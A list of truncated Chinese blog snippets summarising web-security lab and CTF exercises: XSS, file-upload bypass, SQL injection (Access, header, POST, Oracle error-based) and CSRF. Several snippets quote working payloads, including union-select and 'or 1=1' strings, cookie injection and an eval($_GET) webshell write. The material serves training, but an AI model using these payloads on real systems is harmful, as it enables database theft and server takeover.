maomao 反射型XSS
xss主要是拼接网页里的HTML代码反射型只能对当前拼接代码的页面产生影响, 是一次性的找到可以拼接代码的地方尝试拼接成功拼接语句点击获得flag
maomao Dom Based XSS
提示有源码链接:http://120.203.13.75:6815/3/dom.txt dom.php?url=的链接必需是http:120.203.13.75:6815,也就是聊天室链接还需要绕过一堆关键字尝试插入xss成功后放到dom.phphttp://120.203.13.75:6815/3/dom.php?url=http://120.203.13.75:6815/3/?<
maomao 正则表达式匹配题
成功被zkaq.*key.{2,9}:\/.*\/(key*key)匹配则输出flag.任意字符*表示前一个字符匹配0个或任意个\表示转义{2,9}表示最少匹配2个且最多匹配9个, 第二位不写为任意个zkaqkey00://kekey
maomao 后端基础PHP—表单验证
<?php if(isset($_POST['username']) && isset($_POST['password'])){ header('Content-Type:text/html; charset=utf-8'); $conn = mysqli_connect('localhost','
maomao 文件上传解析漏洞pass01-23
Pass-01前端验证绕过使用copy命令制作图片马 上传图片抓包,把后缀改为php上传成功&nb
maomao Accsess注入 — 偏移注入
当知道表名却无法知道字段名时, 可以使用偏移注入需要用到cookie注入通过控制台执行语句后刷新需要一个字段足够多的表可以在产品中心测试document.cookie="id="+escape("105 order by 26"); 猜字段数document.cookie="id="+escape("1 union select
maomao header注入rank1-3
rank1$insert="insert into 'security'.uagents'('uagent','ip_address','username') values('$uagent','$ip','uname')";题目的注入点是user-Agent
maomao POST注入rank1-3
rank1使用万能密码尝试登陆' or 1=1 #' union select 1,database()# 得到数据库名' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'# 得到表名' union&
maomao CSRF跨站伪造请求
CSRF是利用管理员的身份发送恶意请求,前提是浏览器保留了管理员的cookie1.http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_GET[a]);die();//给modifytmp.inc文件写入一
maomao Oracle注入--报错注入
尝试用?id=2'-- 闭合与注释?id=2' and 1=CTXSYS.DRITHSX.SN(1,(select banner from v$version where rownum=1))-- 查询数据库版本?id=2' and 1=CTXSYS.DRITHSX.SN(1,(select count(table_name) from user_tables))-- 查询